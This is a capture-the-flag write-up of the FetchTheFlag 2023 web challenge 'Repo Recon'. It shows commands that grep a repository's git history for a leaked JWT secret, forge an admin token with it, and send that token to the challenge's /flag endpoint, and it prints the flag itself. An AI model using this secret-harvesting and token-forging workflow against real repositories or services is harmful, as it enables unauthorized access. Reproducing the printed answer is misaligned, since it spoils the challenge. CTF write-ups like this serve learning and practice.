Post

FetchTheFlag CTF 2023-Web-RepoRecon

Repo Recon - Medium

Description

Author: @mowzer

Leak Leak Leak

Can you find the secret leak?

Psst… Snyk can help solve this challenge! Try it out!

Press the Start button on the top-right to begin this challenge.
Connect with:
http://challenge.ctf.games:30787

Solution

[RepoRecon] Click Explore our Code to see maybe source code of this page. It direct me to GitHub repository https://github.com/mowzk/repo-recon. after a while I understood all repo. The website want me a JWT toekn that sign with JWT_SECRET(get from .env file in commits history) and the website take token via the cookie name auth_token. Let’s find it in history commits. There are 5,005 commits. The best way is using git to clone this repository to local machine and use git command to show all commits content and grep JWT_SECRET strings.

1
2
3
4
5
6
7
8
$ git clone https://github.com/mowzk/repo-recon.git
$ cd repo-recon
$ git log --patch | grep JWT_SECRET
-JWT_SECRET=18b471a7d39b001bf79f12ab952f1364
+JWT_SECRET=18b471a7d39b001bf79f12ab952f1364
+const JWT_SECRET = process.env.JWT_SECRET;
+      const token = jwt.sign({ username }, JWT_SECRET, { expiresIn: '1h' });
+        jwt.verify(token, JWT_SECRET);

JWT_SECRET=18b471a7d39b001bf79f12ab952f1364 Next, sign jwt cookie with the same command that the server use. jwt.sign({ username }, JWT_SECRET, { expiresIn: '1h' });(in server.js line 25). I use https://replit.com/ to run javascript. [RepoRecon1] JWT token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNjk4NzQ4MzU0LCJleHAiOjE2OTg3NTE5NTR9.MorjJqG-LCtHsUOv4ceb8gSnQoHbINwHSUCRao9nVdM. Let’s request to /flag(found in server.js) with the JWT token to get the flag

1
2
$ curl -b "auth_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNjk4NzQ4MzU0LCJleHAiOjE2OTg3NTE5NTR9.MorjJqG-LCtHsUOv4ceb8gSnQoHbINwHSUCRao9nVdM" http://challenge.ctf.games:30736/flag
{"success":true,"flag":"flag{8ee442003863b85514585c598a6a628b}"}

Flag: flag{8ee442003863b85514585c598a6a628b}

This post is licensed under CC BY-NC 4.0 by the author.